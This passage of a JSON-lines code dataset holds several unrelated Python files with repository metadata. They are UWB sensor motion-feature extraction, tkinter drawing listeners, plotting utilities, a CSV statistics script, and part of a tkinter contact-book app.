df[\"z_velocity_smoothed_magnitude\"] = df[\"z_velocity_smoothed\"].abs()\n\n df[\"velocity_vector_magnitude\"] = (\n df[[\"x_velocity_smoothed_magnitude\", \"y_velocity_smoothed_magnitude\", \"z_velocity_smoothed_magnitude\"]]\n .pow(2)\n .sum(axis=1)\n .pow(0.5)\n )\n\n df[\"velocity_vector_magnitude_xy\"] = (\n df[[\"x_velocity_smoothed_magnitude\", \"y_velocity_smoothed_magnitude\"]].pow(2).sum(axis=1).pow(0.5)\n )\n\n window = pd.tseries.frequencies.to_offset(\n \"2s\"\n ) # int(1 / (pd.tseries.frequencies.to_offset(self.frequency).nanos / 1000000000))\n\n df[\"x_velocity_mean\"] = df[\"x_velocity_smoothed_magnitude\"].rolling(window=window, center=True).mean()\n df[\"y_velocity_mean\"] = df[\"y_velocity_smoothed_magnitude\"].rolling(window=window, center=True).mean()\n df[\"z_velocity_mean\"] = df[\"z_velocity_smoothed_magnitude\"].rolling(window=window, center=True).mean()\n df[\"velocity_average_mean\"] = df[[\"x_velocity_mean\", \"y_velocity_mean\", \"z_velocity_mean\"]].mean(axis=1)\n\n df[\"velocity_vector_magnitude_mean\"] = (\n df[\"velocity_vector_magnitude\"].rolling(window=window, center=True).mean()\n )\n df[\"velocity_vector_magnitude_mean_xy\"] = (\n df[\"velocity_vector_magnitude_xy\"].rolling(window=window, center=True).mean()\n )\n\n df[\"x_velocity_stddev\"] = df[\"x_velocity_smoothed_magnitude\"].rolling(window=window, center=True).std()\n df[\"y_velocity_stddev\"] = df[\"y_velocity_smoothed_magnitude\"].rolling(window=window, center=True).std()\n df[\"z_velocity_stddev\"] = df[\"z_velocity_smoothed_magnitude\"].rolling(window=window, center=True).std()\n df[\"velocity_average_stddev\"] = df[[\"x_velocity_stddev\", \"y_velocity_stddev\", \"z_velocity_stddev\"]].mean(axis=1)\n\n df[\"velocity_vector_magnitude_stddev\"] = (\n df[\"velocity_vector_magnitude\"].rolling(window=window, center=True).std()\n )\n df[\"velocity_vector_magnitude_stddev_xy\"] = (\n df[\"velocity_vector_magnitude_xy\"].rolling(window=window, center=True).std()\n )\n\n df[\"x_velocity_skew\"] = df[\"x_velocity_smoothed_magnitude\"].rolling(window=window, center=True).skew()\n df[\"y_velocity_skew\"] = df[\"y_velocity_smoothed_magnitude\"].rolling(window=window, center=True).skew()\n df[\"z_velocity_skew\"] = df[\"z_velocity_smoothed_magnitude\"].rolling(window=window, center=True).skew()\n df[\"velocity_average_skew\"] = df[[\"x_velocity_skew\", \"y_velocity_skew\", \"z_velocity_skew\"]].mean(axis=1)\n\n df[\"velocity_vector_magnitude_skew\"] = (\n df[\"velocity_vector_magnitude\"].rolling(window=window, center=True).skew()\n )\n df[\"velocity_vector_magnitude_skew_xy\"] = (\n df[\"velocity_vector_magnitude_xy\"].rolling(window=window, center=True).skew()\n )\n\n df[\"x_velocity_variance\"] = df[\"x_velocity_smoothed_magnitude\"].rolling(window=window, center=True).var()\n df[\"y_velocity_variance\"] = df[\"y_velocity_smoothed_magnitude\"].rolling(window=window, center=True).var()\n df[\"z_velocity_variance\"] = df[\"z_velocity_smoothed_magnitude\"].rolling(window=window, center=True).var()\n df[\"velocity_average_variance\"] = df[\n [\"x_velocity_variance\", \"y_velocity_variance\", \"z_velocity_variance\"]\n ].mean(axis=1)\n\n df[\"velocity_vector_magnitude_variance\"] = (\n df[\"velocity_vector_magnitude\"].rolling(window=window, center=True).var()\n )\n df[\"velocity_vector_magnitude_variance_xy\"] = (\n df[\"velocity_vector_magnitude_xy\"].rolling(window=window, center=True).var()\n )\n\n df[\"x_velocity_kurtosis\"] = df[\"x_velocity_smoothed_magnitude\"].rolling(window=window, 
center=True).kurt()\n df[\"y_velocity_kurtosis\"] = df[\"y_velocity_smoothed_magnitude\"].rolling(window=window, center=True).kurt()\n df[\"z_velocity_kurtosis\"] = df[\"z_velocity_smoothed_magnitude\"].rolling(window=window, center=True).kurt()\n df[\"velocity_average_kurtosis\"] = df[\n [\"x_velocity_kurtosis\", \"y_velocity_kurtosis\", \"z_velocity_kurtosis\"]\n ].mean(axis=1)\n\n df[\"velocity_vector_magnitude_kurtosis\"] = (\n df[\"velocity_vector_magnitude\"].rolling(window=window, center=True).kurt()\n )\n df[\"velocity_vector_magnitude_kurtosis_xy\"] = (\n df[\"velocity_vector_magnitude_xy\"].rolling(window=window, center=True).kurt()\n )\n\n df[\"x_y_velocity_correlation\"] = (\n df[\"x_velocity_smoothed_magnitude\"].rolling(window=window).corr(df[\"y_velocity_smoothed_magnitude\"])\n )\n df[\"x_z_velocity_correlation\"] = (\n df[\"x_velocity_smoothed_magnitude\"].rolling(window=window).corr(df[\"z_velocity_smoothed_magnitude\"])\n )\n df[\"y_z_velocity_correlation\"] = (\n df[\"y_velocity_smoothed_magnitude\"].rolling(window=window).corr(df[\"z_velocity_smoothed_magnitude\"])\n )\n df[\"x_velocity_correlation_sum\"] = df[\"x_y_velocity_correlation\"] + df[\"x_z_velocity_correlation\"]\n df[\"y_velocity_correlation_sum\"] = df[\"x_y_velocity_correlation\"] + df[\"y_z_velocity_correlation\"]\n df[\"z_velocity_correlation_sum\"] = df[\"x_z_velocity_correlation\"] + df[\"y_z_velocity_correlation\"]\n\n if not inplace:\n return df\n\n def filter_uwb_data_by_acceleration_activity(self, df_uwb_data: pd.DataFrame, inplace: bool = False):\n \"\"\"\n Filters UWB data by determining the \"active periods\" of each sensor.\n Active periods are periods when acceleration data is being captured. Acceleration data\n is not captured when a device is sleeping due to Wake on Shake. Note, while sleeping,\n position data is reported/captured once a minute. 
This makes position data a\n little more difficult to work with, so we filter by the acceleration data's behavior.\n\n :param df_uwb_data: UWB data for all devices\n :param inplace: Whether to modify the provided df_uwb_data dataframe directly\n\n :return: A filtered df_uwb_data dataframe\n \"\"\"\n if not inplace:\n df_uwb_data = df_uwb_data.copy()\n\n filtered_uwb_data = []\n for device_id, df_device_uwb_data in df_uwb_data.groupby(by=\"device_id\"):\n logger.info(f\"Filtering UWB data by active sessions based on acceleration data for device ID: {device_id}\")\n\n df_device_accelerometer_data = df_device_uwb_data[df_device_uwb_data[\"type\"] == \"accelerometer\"].copy()\n df_device_accelerometer_data[\"active_session_id\"] = (\n df_device_accelerometer_data.index.to_series().diff() >= pd.to_timedelta(\"60 seconds\")\n ).cumsum()\n\n active_session_start_end_times = []\n for _, df_device_accelerometer_session in df_device_accelerometer_data.groupby(by=[\"active_session_id\"]):\n active_session_start_end_times.append(\n {\n \"start\": df_device_accelerometer_session.index.min(),\n \"end\": df_device_accelerometer_session.index.max(),\n }\n )\n df_active_session_start_end_times = pd.DataFrame(active_session_start_end_times)\n\n def _filter_by_start_end_times(start_end_times):\n return (df_device_uwb_data.index >= start_end_times[\"start\"]) & (\n df_device_uwb_data.index <= start_end_times[\"end\"]\n )\n\n start_end_times_mask_list = df_active_session_start_end_times.apply(_filter_by_start_end_times, axis=1)\n if len(start_end_times_mask_list) > 0:\n start_end_times_or_mask = functools.reduce(or_, start_end_times_mask_list)\n filtered_uwb_data.append(df_device_uwb_data[start_end_times_or_mask])\n\n if len(filtered_uwb_data) > 0:\n response = pd.concat(filtered_uwb_data)\n else:\n response = pd.DataFrame(data=None, columns=df_uwb_data.columns, index=df_uwb_data.index)\n\n return response\n\n def remove_wos_acceleration_peaks(\n self, df, x_col=\"x\", y_col=\"y\", z_col=\"z\", require_peak_across_all_axes=False, inplace=False\n ):\n \"\"\"\n Method was created to correct for erroneous acceleration values introduced by WoS. Wake on Shake (WoS) has the tendency to spike when awaking. When analyzing the data, it appeared this data spike is usually contained to a single reading before the readings report sensible data.\n\n This method will remove all spikes from a provided Dataframe. 
Use the cols attributes to specify the x/y/z columns.\n\n Note, data should be normalized before using this method.\n\n :param df:\n :param x_col:\n :param y_col:\n :param z_col:\n :param require_peak_across_all_axes: When set to True the method will only remove a \"peak candidate\" if the peak occurred across all dimensions (x, y, and z)\n :param inplace:\n :return: Dataframe\n \"\"\"\n if not inplace:\n df = df.copy()\n\n x_peaks, x_widths, _ = self.detect_peaks(df[x_col], width=1, min_height_as_percentage_of_max=0.6)\n y_peaks, y_widths, _ = self.detect_peaks(df[y_col], width=1, min_height_as_percentage_of_max=0.6)\n z_peaks, z_widths, _ = self.detect_peaks(df[z_col], width=1, min_height_as_percentage_of_max=0.6)\n\n all_peaks = np.concatenate((x_peaks, y_peaks, z_peaks))\n unique_peaks, peak_counts = np.unique(all_peaks, return_counts=True)\n\n peaks_idxs = unique_peaks\n if require_peak_across_all_axes:\n peaks_idxs = []\n for idx, count in enumerate(peak_counts):\n if count >= 3:\n peaks_idxs.append(unique_peaks[idx])\n\n logger.info(f\"Correcting for WoS, dropping {len(peaks_idxs)} indices by identifying acceleration peaks\")\n\n df = df.drop(df.iloc[peaks_idxs].index)\n\n if not inplace:\n return df\n\n def remove_wos_initial_acceleration_reading_by_time_gaps(self, df_acceleration, inplace=False):\n \"\"\"\n Method was created to correct for erroneous acceleration values introduced by WoS.\n\n Scans the provided dataframe for any time gaps (as defined by 0.5 seconds). Removes the first value following a time gap.\n :param inplace:\n :return:\n \"\"\"\n if not inplace:\n df_acceleration = df_acceleration.copy()\n\n df_acceleration[\"gap\"] = df_acceleration.sort_index().index.to_series().diff() > pd.to_timedelta(\"0.5 seconds\")\n drop_index = df_acceleration.loc[df_acceleration[\"gap\"]].index\n\n logger.info(\n f\"Correcting for WoS, dropping {len(drop_index) + 1} indices by searching for time gaps and removing first data instance\"\n )\n\n # Drop the first item that follows each \"gap\" in time, also drop the very first row which won't be identified with the diff() method\n df_acceleration = df_acceleration.drop(drop_index)\n\n if len(df_acceleration) > 0:\n df_acceleration = df_acceleration.drop(df_acceleration.index[0])\n\n if not inplace:\n return df_acceleration\n\n def normalize_acceleration(self, df, x_col=\"x\", y_col=\"y\", z_col=\"z\", inplace=False):\n if not inplace:\n df = df.copy()\n\n df[\"x_acceleration_normalized\"] = np.absolute(np.subtract(df[x_col], df[x_col].mean()))\n df[\"y_acceleration_normalized\"] = np.absolute(np.subtract(df[y_col], df[y_col].mean()))\n df[\"z_acceleration_normalized\"] = np.absolute(np.subtract(df[z_col], df[z_col].mean()))\n\n if not inplace:\n return df\n\n def calculate_acceleration_features(self, df, inplace=False):\n if not inplace:\n df = df.copy()\n\n if \"x\" in df.columns:\n df.rename(columns={\"x\": \"x_gs\", \"y\": \"y_gs\", \"z\": \"z_gs\"}, inplace=True)\n\n df = self.normalize_acceleration(df, x_col=\"x_gs\", y_col=\"y_gs\", z_col=\"z_gs\")\n\n df[\"acceleration_vector_magnitude\"] = (\n df[[\"x_acceleration_normalized\", \"y_acceleration_normalized\", \"z_acceleration_normalized\"]]\n .pow(2)\n .sum(axis=1)\n .pow(0.5)\n )\n\n window = pd.tseries.frequencies.to_offset(\n \"2s\"\n ) # int(1 / (pd.tseries.frequencies.to_offset(self.frequency).nanos / 1000000000))\n\n df[\"x_acceleration_mean\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).mean()\n df[\"y_acceleration_mean\"] = 
df[\"y_acceleration_normalized\"].rolling(window=window, center=True).mean()\n df[\"z_acceleration_mean\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).mean()\n df[\"acceleration_average_mean\"] = df[\n [\"x_acceleration_mean\", \"y_acceleration_mean\", \"z_acceleration_mean\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_mean\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).mean()\n )\n\n df[\"x_acceleration_sum\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).sum()\n df[\"y_acceleration_sum\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).sum()\n df[\"z_acceleration_sum\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).sum()\n df[\"acceleration_average_sum\"] = df[[\"x_acceleration_sum\", \"y_acceleration_sum\", \"z_acceleration_sum\"]].mean(\n axis=1\n )\n\n df[\"acceleration_vector_magnitude_sum\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).sum()\n )\n\n df[\"x_acceleration_min\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).min()\n df[\"y_acceleration_min\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).min()\n df[\"z_acceleration_min\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).min()\n df[\"acceleration_average_min\"] = df[[\"x_acceleration_min\", \"y_acceleration_min\", \"z_acceleration_min\"]].mean(\n axis=1\n )\n\n df[\"acceleration_vector_magnitude_min\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).min()\n )\n\n df[\"x_acceleration_max\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).max()\n df[\"y_acceleration_max\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).max()\n df[\"z_acceleration_max\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).max()\n df[\"acceleration_average_max\"] = df[[\"x_acceleration_max\", \"y_acceleration_max\", \"z_acceleration_max\"]].mean(\n axis=1\n )\n\n df[\"acceleration_vector_magnitude_max\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).max()\n )\n\n df[\"x_acceleration_stddev\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).std()\n df[\"y_acceleration_stddev\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).std()\n df[\"z_acceleration_stddev\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).std()\n df[\"acceleration_average_stddev\"] = df[\n [\"x_acceleration_stddev\", \"y_acceleration_stddev\", \"z_acceleration_stddev\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_stddev\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).std()\n )\n\n df[\"x_acceleration_skew\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).skew()\n df[\"y_acceleration_skew\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).skew()\n df[\"z_acceleration_skew\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).skew()\n df[\"acceleration_average_skew\"] = df[\n [\"x_acceleration_skew\", \"y_acceleration_skew\", \"z_acceleration_skew\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_skew\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).skew()\n )\n\n df[\"x_acceleration_variance\"] = df[\"x_acceleration_normalized\"].rolling(window=window, 
center=True).var()\n df[\"y_acceleration_variance\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).var()\n df[\"z_acceleration_variance\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).var()\n df[\"acceleration_average_variance\"] = df[\n [\"x_acceleration_variance\", \"y_acceleration_variance\", \"z_acceleration_variance\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_variance\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).var()\n )\n\n df[\"x_acceleration_kurtosis\"] = df[\"x_acceleration_normalized\"].rolling(window=window, center=True).kurt()\n df[\"y_acceleration_kurtosis\"] = df[\"y_acceleration_normalized\"].rolling(window=window, center=True).kurt()\n df[\"z_acceleration_kurtosis\"] = df[\"z_acceleration_normalized\"].rolling(window=window, center=True).kurt()\n df[\"acceleration_average_kurtosis\"] = df[\n [\"x_acceleration_kurtosis\", \"y_acceleration_kurtosis\", \"z_acceleration_kurtosis\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_kurtosis\"] = (\n df[\"acceleration_vector_magnitude\"].rolling(window=window, center=True).kurt()\n )\n\n df[\"x_acceleration_energy\"] = df[\"x_acceleration_normalized\"].pow(2).rolling(window=window, center=True).mean()\n df[\"y_acceleration_energy\"] = df[\"y_acceleration_normalized\"].pow(2).rolling(window=window, center=True).mean()\n df[\"z_acceleration_energy\"] = df[\"z_acceleration_normalized\"].pow(2).rolling(window=window, center=True).mean()\n df[\"acceleration_average_energy\"] = df[\n [\"x_acceleration_energy\", \"y_acceleration_energy\", \"z_acceleration_energy\"]\n ].mean(axis=1)\n\n df[\"acceleration_vector_magnitude_energy\"] = (\n df[\"acceleration_vector_magnitude\"].pow(2).rolling(window=window, center=True).mean()\n )\n\n df[\"x_y_acceleration_correlation\"] = (\n df[\"x_acceleration_normalized\"].rolling(window=window).corr(df[\"y_acceleration_normalized\"])\n )\n df[\"x_z_acceleration_correlation\"] = (\n df[\"x_acceleration_normalized\"].rolling(window=window).corr(df[\"z_acceleration_normalized\"])\n )\n df[\"y_z_acceleration_correlation\"] = (\n df[\"y_acceleration_normalized\"].rolling(window=window).corr(df[\"z_acceleration_normalized\"])\n )\n df[\"x_acceleration_correlation_sum\"] = df[\"x_y_acceleration_correlation\"] + df[\"x_z_acceleration_correlation\"]\n df[\"y_acceleration_correlation_sum\"] = df[\"x_y_acceleration_correlation\"] + df[\"y_z_acceleration_correlation\"]\n df[\"z_acceleration_correlation_sum\"] = df[\"x_z_acceleration_correlation\"] + df[\"y_z_acceleration_correlation\"]\n\n if not inplace:\n return df\n","repo_name":"WildflowerSchools/wf-process-cuwb-data","sub_path":"process_cuwb_data/uwb_motion_features.py","file_name":"uwb_motion_features.py","file_ext":"py","file_size_in_byte":37150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17118138683","text":"from .click_listener import ClickListener\nfrom window.log_viewer import Logger\nfrom objects.point import Point\nfrom util.math_util import distanceSquared\nfrom factory.object_factory import ObjectType\n\nDISTANCE = 200\n\nclass PrePainter:\n\n def get_pre_object(self):\n pass\n\nclass SelectPointsListener(ClickListener, PrePainter):\n\n def __init__(self, objectType, callback):\n super().__init__()\n \n self.objectType = objectType\n self.callback = callback\n self.i = 0\n if self.objectType != ObjectType.WIREFRAME:\n Logger.log(\"Click on Canvas to define point[%i]\" % 
self.i)\n else:\n Logger.log(\"Click on Canvas to define point[%i], to finalize click again on the initial point\" % self.i)\n self.i += 1\n self.points: [Point] = []\n\n def onClick(self, x, y):\n if self.objectType != ObjectType.WIREFRAME:\n Logger.log(\"Canvas (x=%i, y=%i) selected\" % (x, y))\n self.points.append(Point(x, y))\n clicks = self.objectType.value\n if self.i < clicks or (self.objectType == ObjectType.WIREFRAME and (self.i <= 3 or distanceSquared(Point(x, y), self.points[0]) > DISTANCE)): \n if self.objectType == ObjectType.WIREFRAME:\n Logger.log(\"Canvas (x=%i, y=%i) selected\" % (x, y))\n self.points.append(Point(x, y))\n Logger.log(\"Click on Canvas to define point[%i]\" % self.i)\n self.i += 1\n else:\n self.callback(self.objectType, self.points)\n\n def get_pre_object(self):\n return self.points\n\nclass SelectCurvePointsListener(ClickListener, PrePainter):\n\n def __init__(self, callback):\n super().__init__()\n \n self.callback = callback\n Logger.log(\"Click on Canvas and Drag to define a bezier line, to finalize press Enter\")\n self.points = []\n self.current_point = Point(-1, -1)\n\n def onClick(self, x, y):\n self.current_point = Point(x, y)\n Logger.log(\"Canvas (x=%i, y=%i) selected\" % (x, y))\n\n def onRelease(self, x, y):\n if Point(x, y) == self.current_point:\n Logger.log(\"You must drag the mouse to get a bezier curve.\")\n return\n if len(self.points) % 4 == 0:\n self.points.append(self.current_point)\n self.points.append(Point(x, y))\n else:\n self.points.append(Point(x, y))\n self.points.append(self.current_point)\n self.current_point = Point(-1, -1)\n\n Logger.log(\"Release (x=%i, y=%i) selected\" % (x, y))\n if len(self.points) == 4:\n self.callback(ObjectType.CURVE2D, self.points)\n\n def finish(self):\n if len(self.points) < 4:\n Logger.log(\"You must define 2 lines at least\")\n return\n self.callback(ObjectType.CURVE2D, self.points)\n\n def get_pre_object(self):\n return self.points","repo_name":"flametuner/computational-graphics","sub_path":"src/listeners/create_listener.py","file_name":"create_listener.py","file_ext":"py","file_size_in_byte":2907,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21187896265","text":"import os\nfrom typing import List\n\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport seaborn as sns\n\nfrom src.utils.const import FIGURE_DIR\n\ncustom_params = {\n 'figure.figsize': (16, 8),\n 'lines.linewidth': 3,\n 'axes.titlesize': 20,\n 'axes.labelsize': 15,\n 'xtick.labelsize': 15,\n 'ytick.labelsize': 15\n}\n\n\n# sns.set_theme(rc=custom_params)\n# sns.set_palette('bright')\n\n\ndef show_class_distribution(df: pd.DataFrame):\n sns.set_theme(rc=custom_params)\n sns.set_palette('bright')\n distribution = (df.reset_index()\n .groupby('rating_discrete')\n .agg('count')\n .reset_index()\n .rename(columns={'index': 'count'}))\n\n # create pie chart\n plt.gca().axis(\"equal\")\n\n pie = plt.pie(distribution['count'], startangle=0, pctdistance=0.9, radius=1.2)\n\n plt.title('Class distribution train set', fontsize=24)\n\n # Defining intervals labels\n\n labels = [f'{round(i, 2)}-{round(i + 0.45, 2)}' for i in np.arange(0.5, 5, 0.45)]\n plt.legend(pie[0],\n labels,\n bbox_to_anchor=(0.75, 0.5),\n loc=\"center right\",\n fontsize=18,\n bbox_transform=plt.gcf().transFigure)\n plt.subplots_adjust(left=0.0, bottom=0.1, right=0.85)\n plt.show()\n plt.clf()\n plt.close()\n\n\ndef barplot_multiple_columns(groups: List, elements_group: List, 
data: List, title: str, yerr=None, filename: str = '',\n                             save: bool = False, label_count: bool = False, upper_title: bool = True) -> None:\n    if yerr is None:\n        yerr = []\n    sns.set_theme(rc=custom_params)\n\n    sns.set_palette('bright')\n    fig, ax = plt.subplots(figsize=(16, 10))\n\n    # X must be the range over the number of groups in the chart\n    X = np.arange(len(groups))\n    width = 0.1\n    rs = [X]\n    # iterate over the range of the number of bars inside each group\n    for idx in range(1, len(elements_group)):\n        tmp = rs[idx - 1]\n        rs.append(\n            [val + width for val in tmp]\n        )\n    # build an array containing one element per chart group; in this case\n    # each element has cardinality |len(df['model_name'].unique())|\n    for idx, elm in enumerate(elements_group):\n        # df[df['balance']==elm][scores].to_numpy().squeeze() = [f1_random, f1_decision, f1_gaussian, f1_quadratic]\n        if yerr:\n            ax.bar(x=rs[idx], height=data[idx], yerr=yerr[idx], label=elm, width=width)\n        else:\n            ax.bar(x=rs[idx], height=data[idx], label=elm, width=width)\n        if label_count:\n            # ax.text expects scalar coordinates, so annotate one bar at a time\n            for x_pos, bar_value in zip(rs[idx], data[idx]):\n                ax.text(x_pos, 1.05, bar_value, ha='center', va='bottom', rotation=90)\n\n    ax.legend(fontsize=18, loc='lower left')\n    loc_ticks = [(val + (len(elements_group) / 2) * width) - width / 2 for val in\n                 range(len(groups))]\n    upper_labels = [val.upper() for val in groups]\n    ax.set_title(title, fontsize=24)\n    ax.set_xticks(loc_ticks)\n    if upper_title:\n        ax.set_xticklabels(upper_labels)\n    else:\n        ax.set_xticklabels(groups)\n\n    if save:\n        plt.savefig(filename)\n\n    plt.show()\n\n\ndef histplot(x_values: pd.Series, title: str, xlabel: str, ylabel: str, filename: str = '', save: bool = False,\n             **kwargs) -> None:\n    sns.set_theme(rc=custom_params)\n    sns.histplot(\n        data=x_values,\n        **kwargs\n    ).set(xlabel=xlabel, ylabel=ylabel)\n    plt.title(title)\n\n    if save:\n        filepath = os.path.join(FIGURE_DIR, filename)\n        plt.savefig(filepath)\n\n    plt.show()\n\n\ndef kdeplot(x_values: pd.Series, title: str, xlabel: str, ylabel: str, filename: str = '', save: bool = False,\n            print_plot=True,\n            **kwargs) -> None:\n    sns.set_theme(rc=custom_params)\n    sns.kdeplot(\n        data=x_values,\n        **kwargs\n    ).set(xlabel=xlabel, ylabel=ylabel)\n    plt.title(title)\n\n    if save:\n        plt.savefig(filename)\n    if print_plot:\n        plt.show()\n    else:\n        plt.close()\n","repo_name":"prushh/movie-lens-mlp","sub_path":"src/visualization/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":4057,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"2504275149","text":"import argparse\nimport csv\nfrom glob import glob\nimport re\nimport statistics\nimport sys\n\ndef get_stats_from(files_names, files_content):\n    for i in range(len(files_content)):\n        file_name = files_names[i]\n        file_content = files_content[i]\n        print(\"FILE : {0}\".format(file_name))\n        print(\"\\t*MEAN : {0}\".format(statistics.mean(file_content)))\n        print(\"\\t*MEDIAN : {0}\".format(statistics.median(file_content)))\n        print(\"\\t*MOST TYPICAL VALUE : {0}\".format(statistics.mode(file_content)))\n        print(\"\\t*STANDARD DEVIATION : {0}\".format(statistics.stdev(file_content)))\n        print(\"\\t*VARIANCE : {0}\".format(statistics.variance(file_content)))\n\ndef get_global_stats(files_content):\n    data = []\n    for sublist in files_content:\n        data = data + sublist\n    print(\"*GLOBAL MEAN : {0}\".format(statistics.mean(data)))\n    print(\"*GLOBAL MEDIAN : {0}\".format(statistics.median(data)))\n    print(\"*GLOBAL MOST TYPICAL VALUE : {0}\".format(statistics.mode(data)))\n    
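A minimal usage sketch for the grouped-bar helper defined above; the group and series names and the scores are invented for illustration. `data` holds one list of bar heights per series, ordered by group:

groups = ["svm", "mlp"]
elements_group = ["balanced", "unbalanced"]
data = [[0.81, 0.78],   # heights for the "balanced" series, one per group
        [0.74, 0.70]]   # heights for the "unbalanced" series
barplot_multiple_columns(groups, elements_group, data, title="F1 by model and balancing")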
print(\"*GLOBAL STANDARD DEVIATION : {0}\".format(statistics.stdev(data)))\n print(\"*GLOBAL VARIANCE : {0}\".format(statistics.variance(data)))\n\ndef main():\n parser = argparse.ArgumentParser(description='Get stats from Powertool output')\n parser.add_argument('-p', '--path', type=str, default=None, required=True,\n help=\"specify path to your directories\")\n parser.add_argument('-o', '--output', action=\"store_true\",\n help=\"save the output in the analysed directory\")\n args = parser.parse_args()\n\n directories = glob(args.path+\"*\")\n\n if len(directories) == 0:\n sys.exit(1)\n\n csv_files = []\n\n for directory in directories:\n current_files = [x for x in glob(directory + \"/*\") if \".csv\" in x]\n csv_files = csv_files + current_files\n\n files_content = []\n\n for csv_file in csv_files:\n with open(csv_file, \"r\") as csv_content:\n csv_reader = csv.reader(csv_content)\n files_content.append([float(row[0]) for row in csv_reader if not (re.match(\"^\\d+?\\.\\d+?$\", row[0]) is None)])\n\n get_stats_from(directories, files_content)\n\n get_global_stats(files_content)\n\nif __name__ == '__main__':\n main()\n","repo_name":"k0pernicus/fxos-powertool","sub_path":"get_stats_from.py","file_name":"get_stats_from.py","file_ext":"py","file_size_in_byte":2231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"31311184027","text":"from tkinter import *\nimport csv\nfrom tkinter import messagebox as ms\nimport uuid\n\n\nglobal data\nglobal row\ndata = []\nwith open('ambot.csv', 'r') as rf:\n n = csv.reader(rf)\n for row in n:\n if row:\n data.append(row)\n\n\n# Main Class which consist of all operations and codes for the GUI\nclass main:\n def __init__(self, master):\n self.master = master\n self.fullname = StringVar()\n self.email = StringVar()\n self.number = StringVar()\n self.var = StringVar()\n self.optionList = [\"Mobile\", \"Work\", \"Home\"]\n\n self.n_fullName = StringVar()\n self.n_email = StringVar()\n self.n_number = StringVar()\n self.n_var = StringVar()\n self.n_mobile = StringVar()\n self.n_work = StringVar()\n self.n_home = StringVar()\n # Create Widgets\n self.widgets()\n\n # This Function is used to search and verify if a contact exists\n def search_contacts(self):\n mirror = bool\n fullname = self.n_fullName.get()\n for row in data:\n for field in row:\n if field == fullname:\n mirror = True\n print(row)\n print(data)\n # display fullname\n Label(self.find, text=' Full Name: ', font=('', 15), pady=5, padx=5, bg = 'yellow', fg= '#970af5').grid(row=4, column=0)\n name = Label(self.find, text=str(row[0]), font=('', 15), bg = 'yellow', fg= '#970af5')\n name.grid(row=4, column=1)\n Button(self.find, text='EDIT', bd=3, font=('', 10), padx=5, command=self.UpdateName).grid(row=4,\n column=2)\n\n # email\n Label(self.find, text=' E-MAIL: ', font=('', 15), pady=5, padx=5, bg = 'yellow', fg= '#970af5').grid(row=5, column=0)\n email = Label(self.find, text=row[1], font=('', 15), bg = 'yellow', fg= '#970af5')\n email.grid(row=5, column=1)\n Button(self.find, text='EDIT', bd=3, font=('', 10), padx=5, command=self.UpdatEmail).grid(row=5,\n column=2)\n\n # mobile\n Label(self.find, text='MOBILE NUMBER: ', font=('', 15), pady=5, padx=5, bg = 'yellow', fg= '#970af5').grid(row=6, column=0)\n mobile = Label(self.find, text=row[3], font=('', 15), bg = 'yellow', fg= '#970af5')\n mobile.grid(row=6, column=1)\n Button(self.find, text='EDIT', bd=3, font=('', 10), padx=5, command=self.UpdateMobile).grid(row=6,\n column=2)\n # work\n 
Label(self.find, text=' WORK NUMBER: ', font=('', 15), pady=5, padx=5, bg = 'yellow', fg= '#970af5').grid(row=7, column=0)\n                    work = Label(self.find, text=row[4], font=('', 15), bg = 'yellow', fg= '#970af5')\n                    work.grid(row=7, column=1)\n                    Button(self.find, text='EDIT', bd=3, font=('', 10), padx=5, command=self.UpdateWork).grid(row=7, column=2)\n\n                    # home\n                    Label(self.find, text=' HOME NUMBER: ', font=('', 15), pady=5, padx=5, bg = 'yellow', fg= '#970af5').grid(row=8, column=0)\n                    home = Label(self.find, text=row[5], font=('', 15), bg = 'yellow', fg= '#970af5')\n                    home.grid(row=8, column=1)\n                    Button(self.find, text='EDIT', bd=3, font=('', 10), padx=5, command=self.UpdateHome).grid(row=8, column=2)\n                    Button(self.find, text='UPDATE', bd=3, font=('', 15), padx=5, command=self.update_writer, bg = 'yellow', fg= '#970af5').grid(row=10, column=0)\n                    Button(self.find, text='DELETE', bd=3, font=('', 15), padx=5, command=self.Delete, bg = 'yellow', fg= '#970af5').grid(row=10, column=1)\n\n        if mirror != True:\n            